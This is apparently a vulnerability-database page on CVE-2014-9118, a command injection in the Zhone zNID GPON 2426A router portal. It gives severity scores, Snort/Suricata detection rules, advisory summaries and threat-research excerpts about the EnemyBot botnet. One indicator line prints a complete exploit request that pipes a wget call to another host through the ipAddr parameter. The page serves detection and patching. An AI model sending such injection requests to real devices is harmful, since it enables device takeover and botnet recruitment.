CVE-2014-9118
published 2017-10-17CVE-2014-9118: The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the…
PriorityP186high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
53.36%
98.9th percentile
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.
Detection & IOCsextracted from sources · hover to see the quote
url/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3↗
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=ping"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036749; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=traceroute"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036750; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- →The Snort PCRE pattern for detecting shell metacharacter injection in the `ipAddr` parameter is: `/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri` — match against the value of `ipAddr=` in the URI.
- →Exploit has been observed in the wild as part of EnemyBot IoT malware campaigns targeting public-facing devices.
- →The exploit PoC uses URL-encoded shell metacharacters such as `%7c` (pipe) to bypass naive input filters in the `ipAddr` parameter. ↗
- ·The exploit requires a valid `sessionKey` in the request. Low-privileged authenticated users (not just admins) can trigger the RCE, as the web portal only enforces access control client-side via JavaScript. ↗
- ·The vulnerability affects Zhone zNID GPON 2426A firmware versions before S3.0.501. Detection rules should be scoped to devices running versions prior to this. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8fhg-9q98-67hg: The web administrative portal in Zhone zNID GPON 2426A before S3
ghsa_unreviewed·2022-05-14
CVE-2014-9118 [HIGH] CWE-77 GHSA-8fhg-9q98-67hg: The web administrative portal in Zhone zNID GPON 2426A before S3
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.
VulnCheck
dasanzhone znid_2426a_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2014·CVSS 8.8
CVE-2014-9118 [HIGH] dasanzhone znid_2426a_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
dasanzhone znid_2426a_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.
Affected: dasanzhone znid_2426a_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet; https://blog.netlab.360.com/men-sheng-fa-da-cai-fodchajiang-shi-wang-luo/; https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeti
Suricata
ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1
suricata·2022-06-02·CVSS 8.8
CVE-2014-9118 [HIGH] ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=ping"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036749; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_sev
Suricata
ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2
suricata·2022-06-02·CVSS 8.8
CVE-2014-9118 [HIGH] ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=traceroute"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036750; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signatu
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Greynoiseio
NoiseLetter January 2026
blogs_greynoiseio
NoiseLetter January 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/133921/Zhone-Insecure-Reference-Password-Disclosure-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2015/Oct/57http://www.securityfocus.com/archive/1/536663/100/0/threadedhttps://www.exploit-db.com/exploits/38453/http://packetstormsecurity.com/files/133921/Zhone-Insecure-Reference-Password-Disclosure-Command-Injection.htmlhttp://seclists.org/fulldisclosure/2015/Oct/57http://www.securityfocus.com/archive/1/536663/100/0/threadedhttps://www.exploit-db.com/exploits/38453/
2017-10-17
Published
Exploited in the wild